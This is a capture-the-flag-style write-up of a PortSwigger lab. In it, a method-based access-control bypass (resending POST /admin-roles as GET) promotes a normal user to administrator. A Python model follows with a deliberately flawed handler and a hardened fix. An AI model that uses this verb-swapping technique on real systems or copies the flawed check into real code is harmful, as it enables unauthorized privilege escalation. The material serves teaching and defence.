| Field | Details |
|---|---|
| Platform | PortSwigger Web Security Academy |
| Type | Access Control (Method-Based Bypass) |
| Difficulty | Practitioner |
| Objective | Log in as wiener:peter and exploit the flawed access controls to promote yourself to administrator |
Method-Based Access Control Can Be Circumvented
Log in as administrator:admin.
There's a list to upgrade/downgrade users. Upgrading a user shows the request:
```http
POST /admin-roles HTTP/2
Host: 0af400d604dcbaf180b4174000d6000e.web-security-academy.net
Cookie: session=LNJPhQ9dm3Ylr6TdAN9zJ4YyjtKpyjew

username=carlos&action=upgrade
```
Sending this upgrades carlos; changing action to downgrade downgrades him — both followed by a 302 redirect.
Logging in as wiener:peter.
Trying the same /admin-roles request as wiener:
```http
POST /admin-roles HTTP/2
Host: 0af400d604dcbaf180b4174000d6000e.web-security-academy.net
Cookie: session=mQS61qNxftuEkWj6ozHt0sV30Qwy773E

username=wiener&action=upgrade
```
401 Unauthorized — POST /admin-roles is correctly restricted for non-admins. Switching the method to GET and moving the parameters into the query string:
```http
GET /admin-roles?username=wiener&action=upgrade HTTP/2
Host: 0af400d604dcbaf180b4174000d6000e.web-security-academy.net
Cookie: session=mQS61qNxftuEkWj6ozHt0sV30Qwy773E
```
302 Found. The authorization check is bound to the HTTP verb rather than to the action: it is enforced for POST, but the role-change logic behind /admin-roles still runs when the endpoint is reached with GET, and it reads username and action from the query string just as readily as from a form body. The correct fix is to authorize the request before (and independently of) any dispatch on method, and to reject verbs the endpoint does not intend to serve. Following the redirect shows that wiener now has admin privileges; the lab is solved :P
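The following is an added model of the flaw, not the lab's server code: a small in-process version of /admin-roles with the verb-bound check beside a hardened one, plus a parser that reads parameters from either the query string or a form body so the two requests from the writeup can be replayed against both handlers. The session table, role table and sample requests are constructed for the example; only the cookie values and request lines are taken from the writeup.

```python
"""Model of a method-based access-control bypass (constructed example)."""
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Tuple
from urllib.parse import parse_qsl, urlsplit

# Constructed session table standing in for the lab's session cookies.
SESSIONS = {
    "LNJPhQ9dm3Ylr6TdAN9zJ4YyjtKpyjew": "administrator",
    "mQS61qNxftuEkWj6ozHt0sV30Qwy773E": "wiener",
}
ADMINS = {"administrator"}


@dataclass
class Request:
    method: str
    path: str
    user: Optional[str]      # user bound to the session cookie, if any
    params: Dict[str, str]   # merged query-string and form-body parameters


def parse_request(raw: str) -> Request:
    """Parse a raw HTTP request as pasted in the writeup.

    Parameters are collected from both the query string and a form-encoded
    body, so the same action reaches the handler whichever way it was sent.
    """
    head, _, body = raw.lstrip("\n").partition("\n\n")
    request_line, *headers = head.splitlines()
    method, target, _version = request_line.split()
    url = urlsplit(target)
    user = None
    for line in headers:
        name, _, value = line.partition(":")
        if name.strip().lower() == "cookie":
            cookies = dict(parse_qsl(value.strip().replace("; ", "&")))
            user = SESSIONS.get(cookies.get("session", ""))
    params = dict(parse_qsl(url.query))
    params.update(parse_qsl(body.strip()))
    return Request(method, url.path, user, params)


def new_roles() -> Dict[str, str]:
    return {"administrator": "admin", "wiener": "user", "carlos": "user"}


def change_role(roles: Dict[str, str], params: Dict[str, str]) -> Tuple[int, str]:
    """The privileged action itself: upgrade or downgrade a user, then redirect."""
    username, action = params.get("username"), params.get("action")
    if username not in roles or action not in ("upgrade", "downgrade"):
        return 400, "Bad Request"
    roles[username] = "admin" if action == "upgrade" else "user"
    return 302, "Found"


def vulnerable_admin_roles(roles: Dict[str, str], req: Request) -> Tuple[int, str]:
    """Flawed handler: the admin check only fires for POST, as in the lab."""
    if req.method == "POST" and req.user not in ADMINS:
        return 401, "Unauthorized"
    return change_role(roles, req.params)


def hardened_admin_roles(roles: Dict[str, str], req: Request) -> Tuple[int, str]:
    """Fixed handler: authorize for every verb first, then restrict to POST."""
    if req.user not in ADMINS:
        return 401, "Unauthorized"
    if req.method != "POST":
        return 405, "Method Not Allowed"
    return change_role(roles, req.params)


def probe(handler: Callable, raw_requests: List[str]) -> List[Tuple[str, int, str]]:
    """Replay each request against a fresh role table.

    Returns (method, status, resulting role of the targeted user) per request.
    """
    out = []
    for raw in raw_requests:
        roles = new_roles()
        req = parse_request(raw)
        status, _ = handler(roles, req)
        out.append((req.method, status, roles[req.params["username"]]))
    return out


HOST = "0af400d604dcbaf180b4174000d6000e.web-security-academy.net"
# Constructed replays of the two requests shown in the writeup.
WIENER_POST = (
    f"POST /admin-roles HTTP/2\nHost: {HOST}\n"
    "Cookie: session=mQS61qNxftuEkWj6ozHt0sV30Qwy773E\n"
    "Content-Type: application/x-www-form-urlencoded\n\n"
    "username=wiener&action=upgrade\n"
)
WIENER_GET = (
    f"GET /admin-roles?username=wiener&action=upgrade HTTP/2\nHost: {HOST}\n"
    "Cookie: session=mQS61qNxftuEkWj6ozHt0sV30Qwy773E\n"
)

if __name__ == "__main__":
    for name, handler in (("vulnerable", vulnerable_admin_roles), ("hardened", hardened_admin_roles)):
        print(name, probe(handler, [WIENER_POST, WIENER_GET]))
```

Against the flawed handler the replay reproduces the writeup: POST returns 401 and leaves wiener a normal user, GET returns 302 and makes wiener an admin. Against the hardened handler both verbs get 401, because the authorization decision no longer depends on the method; the 405 branch is only reachable once the caller is an administrator.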